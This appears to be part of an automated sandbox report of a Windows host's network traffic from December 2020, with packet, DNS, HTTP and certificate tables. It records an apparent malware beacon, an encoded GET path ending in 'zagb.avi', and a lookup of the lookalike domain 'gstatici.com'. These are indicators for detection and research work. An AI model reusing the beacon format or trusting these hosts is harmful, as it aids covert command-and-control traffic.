                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.328632116 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.328634024 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.328691006 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.328691006 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.328747988 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.328748941 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.328944921 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.348448038 CET44349743151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.355066061 CET44349747151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.360445976 CET44349744151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.377906084 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.383038998 CET44349742151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.051815987 CET4975680192.168.2.565.9.70.182
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.051876068 CET4975780192.168.2.565.9.70.182
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.068083048 CET804975665.9.70.182192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.068121910 CET804975765.9.70.182192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.068182945 CET4975680192.168.2.565.9.70.182
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.068244934 CET4975780192.168.2.565.9.70.182
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.069366932 CET4975680192.168.2.565.9.70.182
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.085552931 CET804975665.9.70.182192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.612848997 CET804975665.9.70.182192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.612943888 CET4975680192.168.2.565.9.70.182
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:18.084892988 CET804975765.9.70.182192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:18.084997892 CET4975780192.168.2.565.9.70.182
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.593158007 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.593306065 CET49743443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.593424082 CET49744443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.593467951 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.593604088 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.593732119 CET49742443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612348080 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612377882 CET44349745151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612405062 CET44349743151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612430096 CET44349743151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612437010 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612457991 CET44349747151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612483025 CET44349747151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612484932 CET49745443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612518072 CET44349744151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612550020 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612556934 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612576008 CET44349744151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612576008 CET49747443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612574100 CET49743443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612602949 CET44349746151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612605095 CET49743443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612610102 CET49744443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612631083 CET44349742151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612638950 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612653971 CET44349742151.101.1.44192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612658978 CET49744443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612693071 CET49746443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612720013 CET49742443192.168.2.5151.101.1.44
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:57.612745047 CET49742443192.168.2.5151.101.1.44

                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Dec 15, 2020 08:04:59.197457075 CET5516153192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:04:59.222115040 CET53551618.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:06.363739967 CET5475753192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:06.396306992 CET53547578.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:07.896959066 CET4999253192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:07.937046051 CET53499928.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:08.104702950 CET6007553192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:08.128947020 CET53600758.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:08.390064955 CET5501653192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:08.406310081 CET6434553192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:08.414616108 CET53550168.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:08.440409899 CET53643458.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:09.967433929 CET5712853192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:10.008081913 CET53571288.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:10.341219902 CET5479153192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:10.380948067 CET53547918.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:11.435864925 CET5046353192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:11.483303070 CET53504638.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:12.324146986 CET5039453192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:12.364669085 CET53503948.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:12.396560907 CET5853053192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:12.439841032 CET53585308.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:12.880245924 CET5381353192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:12.914601088 CET53538138.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:13.285064936 CET6373253192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:13.312372923 CET53637328.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.099746943 CET5734453192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.133708954 CET53573448.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:24.350373030 CET5445053192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:24.383271933 CET53544508.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:24.707604885 CET5926153192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:24.734826088 CET53592618.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:25.948318005 CET5715153192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:25.983287096 CET53571518.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:27.379712105 CET5941353192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:27.422482967 CET53594138.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:36.318396091 CET6051653192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:36.343147039 CET53605168.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:37.333986998 CET6051653192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:37.358257055 CET53605168.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:37.770169020 CET5164953192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:37.805612087 CET53516498.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:38.344109058 CET6051653192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:38.368474960 CET53605168.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:38.781114101 CET5164953192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:38.805721998 CET53516498.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:39.796658993 CET5164953192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:39.821312904 CET53516498.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:40.343414068 CET6051653192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:40.376193047 CET53605168.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:41.803203106 CET5164953192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:41.827723026 CET53516498.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:44.355298996 CET6051653192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:44.388187885 CET53605168.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:45.807468891 CET5164953192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:45.840408087 CET53516498.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:47.990803957 CET6508653192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.036978960 CET53650868.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.975291014 CET5643253192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:49.002808094 CET53564328.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:49.150758028 CET5292953192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:49.196538925 CET53529298.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:51.091572046 CET6431753192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:51.115989923 CET53643178.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:55.721534014 CET6100453192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:55.756670952 CET53610048.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:04.003635883 CET5689553192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:04.040821075 CET53568958.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:12.066328049 CET6237253192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:12.099014044 CET53623728.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:17.695101976 CET6151553192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:17.730439901 CET53615158.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:18.700413942 CET6151553192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:18.727737904 CET53615158.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:19.699363947 CET6151553192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:19.726741076 CET53615158.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:21.717113018 CET6151553192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:21.744676113 CET53615158.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:25.715962887 CET6151553192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:25.743566990 CET53615158.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:44.708986998 CET5667553192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:44.736408949 CET53566758.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:45.049645901 CET5717253192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:06:45.090816021 CET53571728.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:38.863322020 CET5526753192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:38.899342060 CET53552678.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:39.434606075 CET5096953192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:39.467514038 CET53509698.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:40.121335030 CET6436253192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:40.145867109 CET53643628.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:40.573577881 CET5476653192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:40.606950045 CET53547668.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:41.154301882 CET6144653192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:41.190156937 CET53614468.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:41.974993944 CET5751553192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:41.999238968 CET53575158.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:42.562088966 CET5819953192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:42.594902992 CET53581998.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:43.449856997 CET6522153192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:43.486000061 CET53652218.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:44.454155922 CET6157353192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:44.487550020 CET53615738.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:45.034110069 CET5656253192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:07:45.066963911 CET53565628.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:08:12.279288054 CET5359153192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:08:12.312166929 CET53535918.8.8.8192.168.2.5
                                                                                                                                                                                                                                        Dec 15, 2020 08:08:33.528208971 CET5968853192.168.2.58.8.8.8
                                                                                                                                                                                                                                        Dec 15, 2020 08:08:33.574223995 CET53596888.8.8.8192.168.2.5

                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:08.104702950 CET192.168.2.58.8.8.80xe6a3Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:09.967433929 CET192.168.2.58.8.8.80x92a7Standard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:10.341219902 CET192.168.2.58.8.8.80x889Standard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:12.324146986 CET192.168.2.58.8.8.80xa7a1Standard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:12.396560907 CET192.168.2.58.8.8.80x49a2Standard query (0)hblg.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:12.880245924 CET192.168.2.58.8.8.80xc6a0Standard query (0)cvision.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:13.285064936 CET192.168.2.58.8.8.80x9099Standard query (0)srtb.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.099746943 CET192.168.2.58.8.8.80x4651Standard query (0)img.img-taboola.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:47.990803957 CET192.168.2.58.8.8.80xccdfStandard query (0)ocsp.sca1b.amazontrust.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:08:12.279288054 CET192.168.2.58.8.8.80x9c8cStandard query (0)gstatici.comA (IP address)IN (0x0001)

                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:08.128947020 CET8.8.8.8192.168.2.50xe6a3No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:10.008081913 CET8.8.8.8192.168.2.50x92a7No error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:10.380948067 CET8.8.8.8192.168.2.50x889No error (0)contextual.media.net104.84.56.24A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:12.364669085 CET8.8.8.8192.168.2.50xa7a1No error (0)lg3.media.net104.84.56.24A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:12.439841032 CET8.8.8.8192.168.2.50x49a2No error (0)hblg.media.net104.84.56.24A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:12.914601088 CET8.8.8.8192.168.2.50xc6a0No error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:13.312372923 CET8.8.8.8192.168.2.50x9099No error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:13.312372923 CET8.8.8.8192.168.2.50x9099No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.133708954 CET8.8.8.8192.168.2.50x4651No error (0)img.img-taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.133708954 CET8.8.8.8192.168.2.50x4651No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.133708954 CET8.8.8.8192.168.2.50x4651No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.133708954 CET8.8.8.8192.168.2.50x4651No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.133708954 CET8.8.8.8192.168.2.50x4651No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.036978960 CET8.8.8.8192.168.2.50xccdfNo error (0)ocsp.sca1b.amazontrust.com65.9.70.182A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.036978960 CET8.8.8.8192.168.2.50xccdfNo error (0)ocsp.sca1b.amazontrust.com65.9.70.13A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.036978960 CET8.8.8.8192.168.2.50xccdfNo error (0)ocsp.sca1b.amazontrust.com65.9.70.177A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.036978960 CET8.8.8.8192.168.2.50xccdfNo error (0)ocsp.sca1b.amazontrust.com65.9.70.113A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:08:12.312166929 CET8.8.8.8192.168.2.50x9c8cNo error (0)gstatici.com195.110.58.176A (IP address)IN (0x0001)
                                                                                                                                                                                                                                        Dec 15, 2020 08:08:12.312166929 CET8.8.8.8192.168.2.50x9c8cNo error (0)gstatici.com109.248.203.145A (IP address)IN (0x0001)

                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                        • ocsp.sca1b.amazontrust.com

                                                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                        0192.168.2.54975665.9.70.18280C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.069366932 CET2104OUTGET /images/_2BGeSkvWMHh/BUynXFpIFo3/59SKHc0FAlUbbS/AAtvmEP6bSxngBIQxSpAq/spVOjE6SRSYYM_2B/1kssSPGZE9BGerK/aySQiowSzRMTuPb2VY/iGbL_2FuQ/kIutS_2BJ_2FiHpi94lZ/RSri6_2BC0CK8ZJ8hbj/y5F3ZxB7PT1kx7tzJMiZB9/E_2Bs_2BXabKH/oLNRmzX7_2BipXb_2B/zagb.avi HTTP/1.1
                                                                                                                                                                                                                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                                                        Accept-Language: en-US
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        Host: ocsp.sca1b.amazontrust.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:48.612848997 CET2137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Content-Type: application/ocsp-response
                                                                                                                                                                                                                                        Content-Length: 5
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Cache-Control: public, max-age=300
                                                                                                                                                                                                                                        Date: Tue, 15 Dec 2020 07:05:48 GMT
                                                                                                                                                                                                                                        ETag: "5f46cfbf-5"
                                                                                                                                                                                                                                        Last-Modified: Wed, 26 Aug 2020 21:10:23 GMT
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                        Via: 1.1 ab402055ebb78b405a698ff055138d0c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                        X-Amz-Cf-Pop: FRA56-C1
                                                                                                                                                                                                                                        X-Amz-Cf-Id: Gc_V2Gmzwp100hrYxm-B74pQ9CXwjMw0iWtBBPHhWRj0DMuP1Vn2ZQ==
                                                                                                                                                                                                                                        Data Raw: 30 03 0a 01 06
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        HTTPS Packets

                                                                                                                                                                                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.194814920 CET151.101.1.44443192.168.2.549742CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.197638988 CET151.101.1.44443192.168.2.549747CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                        Dec 15, 2020 08:05:14.197936058 CET151.101.1.44443192.168.2.549743CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                        CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
